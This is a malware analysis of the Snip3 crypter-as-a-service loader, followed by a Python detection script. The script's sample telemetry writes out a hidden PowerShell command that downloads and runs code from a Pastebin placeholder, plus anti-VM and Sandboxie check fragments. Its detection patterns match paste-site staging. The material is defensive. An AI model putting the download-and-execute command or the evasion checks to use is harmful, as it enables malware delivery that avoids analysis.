Snip3 Loader Description
Researchers at Morphisec have discovered a new and highly sophisticated malware threat that they have named the 'Snip3' cryptor. The threat is offered in a Cryptor-as-a-Service scheme and is being used in ongoing attack campaigns that deliver numerous RAT (Remote Access Trojan) strains as final payloads on the compromised machines. The most powerful features of the Snip3 loader are its detection-avoidance and anti-analysis capabilities, which are based on several advanced techniques, such as executing PowerShell code with the 'remotesigned' parameter, using Pastebin and top4top for staging, compiling runPE loaders at runtime, and checking for Windows Sandbox and VMware virtualization.
The attack chain consists of multiple stages, with the initial attack vector being disseminated through phishing emails. The lure messages try to trick the targeted user into downloading a corrupted Visual Basic file. In some instances, the threat actors instead used a large install file to hide the delivery of their malware tool.
The Initial Stage of Snip3 Attack
The first stage involves the deployment of a VB script that is responsible for prepping and initializing the next stage of the malware attack - a second-stage PowerShell script. Infosec researchers have managed to identify four main versions of the VB script alongside 11 sub-versions. What differentiates the four versions is the exact method used to load the next-stage PowerShell, while the sub-versions employ different obfuscation types. It should be noted that at this early stage, the threat actor has implemented a rather unique technique observed in some of the versions - the script executes PowerShell with a '-RemoteSigned' parameter as a command.
Second Stage of the Snip3 Operation
The second stage revolves mainly around making sure that the malware is not being executed in a virtual environment. If everything appears to be within expectations, the PowerShell script will then move on to load runPE to execute the selected RAT payload reflectively within a hollowed Windows process.
Snip3 is equipped with extra anti-VM measures compared to the usual code seen in the wild, which is not capable of detecting Windows Sandbox. To check for potential VMs such as VMware, VirtualBox, or Windows Sandbox, the PowerShell script extracts the Manufacturer string and compares it to a list of hardcoded strings. To detect Sandboxie environments, the malware attempts to resolve a handle to a DLL named SbieDll.dll. If a VM is found, the malware terminates its operations without delivering the RAT payload.
The Deployment of a RAT Threat
The last stage of Snip3's operations sees the threat deliver a selected RAT malware to the infected system. The delivery mechanism differs from what is commonly observed in other threatening campaigns. Snip3 doubles down on its stealthiness by carrying an embedded, GZIP-compressed source code that is compiled at runtime. This source code appears to be a modified version of the runPE from a GitHub repository named NYAN-x-CAT.
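The behaviours described in the three stages above (a script host spawning PowerShell with the RemoteSigned policy and staging from paste sites, the Manufacturer and SbieDll.dll checks, and the GZIP-compressed source compiled at runtime) map directly onto detection logic. The following Python script is an added example, not code from the original description or from Morphisec; the telemetry field names, the sample events, the Pastebin placeholder URL and the alert threshold are all assumptions constructed for this illustration.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real events). Field names are assumptions that
# loosely mirror process-creation and PowerShell script-block logging.
SAMPLE_EVENTS = [
    {   # Stage 1: VB script host launches PowerShell with RemoteSigned and a paste-site stager
        "type": "process", "host": "WS01",
        "parent": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": ("powershell.exe -ExecutionPolicy RemoteSigned -w hidden "
                    "-c \"IEX (New-Object Net.WebClient).DownloadString("
                    "'https://pastebin.com/raw/PLACEHOLDER')\""),
    },
    {   # Stages 2 and 3: anti-VM checks and runtime compilation of GZIP'd source (fragment)
        "type": "scriptblock", "host": "WS01",
        "script": ("$m=(Get-WmiObject Win32_ComputerSystem).Manufacturer; "
                   "if($m -match 'VMware|VirtualBox|Microsoft Corporation'){exit}; "
                   "... SbieDll.dll ... [IO.Compression.GzipStream] ... "
                   "Add-Type -TypeDefinition $src"),
    },
    {   # Benign administrative PowerShell launched from Explorer
        "type": "process", "host": "WS02",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    },
]

# Vendor strings a Manufacturer comparison would target; Hyper-V based guests such as
# Windows Sandbox report "Microsoft Corporation".
VM_VENDORS = r"vmware|virtualbox|microsoft corporation"


def process_indicators(ev):
    """Return indicator names matched by a process-creation event."""
    hits = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "").lower()
    if not image.endswith("powershell.exe"):
        return hits
    # Stage 1: the VB script (wscript/cscript) is the parent of PowerShell.
    if parent.endswith(("wscript.exe", "cscript.exe")):
        hits.append("powershell_spawned_by_script_host")
    # Stage 1: PowerShell started with the RemoteSigned execution policy.
    if "remotesigned" in cmd:
        hits.append("remotesigned_policy")
    # Staging hosts named in the write-up.
    if re.search(r"pastebin\.com|top4top", cmd):
        hits.append("paste_site_staging")
    return hits


def script_indicators(ev):
    """Return indicator names matched by a script-block logging event."""
    hits = []
    low = ev.get("script", "").lower()
    # Stage 2: Manufacturer string compared against hardcoded VM vendor names.
    if "manufacturer" in low and re.search(VM_VENDORS, low):
        hits.append("vm_vendor_check")
    # Stage 2: Sandboxie detection by resolving SbieDll.dll.
    if "sbiedll.dll" in low:
        hits.append("sandboxie_check")
    # Stage 3: GZIP-compressed source handed to Add-Type for runtime compilation.
    if "gzipstream" in low and "add-type" in low:
        hits.append("runtime_compile_gzip")
    return hits


def triage(events, threshold=3):
    """Aggregate indicators per host and return hosts at or above the threshold."""
    per_host = defaultdict(list)
    for ev in events:
        fn = process_indicators if ev["type"] == "process" else script_indicators
        per_host[ev["host"]].extend(fn(ev))
    return {host: hits for host, hits in per_host.items() if len(hits) >= threshold}


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(hits)}")
```

The threshold exists because any single indicator (a RemoteSigned policy, an Add-Type call) is common in legitimate administration; it is the combination of a script-host parent, paste-site staging, VM-vendor comparison and runtime compilation on one host that is characteristic of this loader chain.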
So far, several RAT threats have been observed being dropped as the final payload by Snip3. Most often the deployed threats are AsyncRAT or RevengeRAT. However, there have been cases in which Snip3 variants have delivered Agent Tesla or the NetWire RAT.
Organizations should take into account the disclosed IoCs (Indicators of Compromise) as well as the capabilities of Snip3 that allow it to easily bypass detection-centric solutions.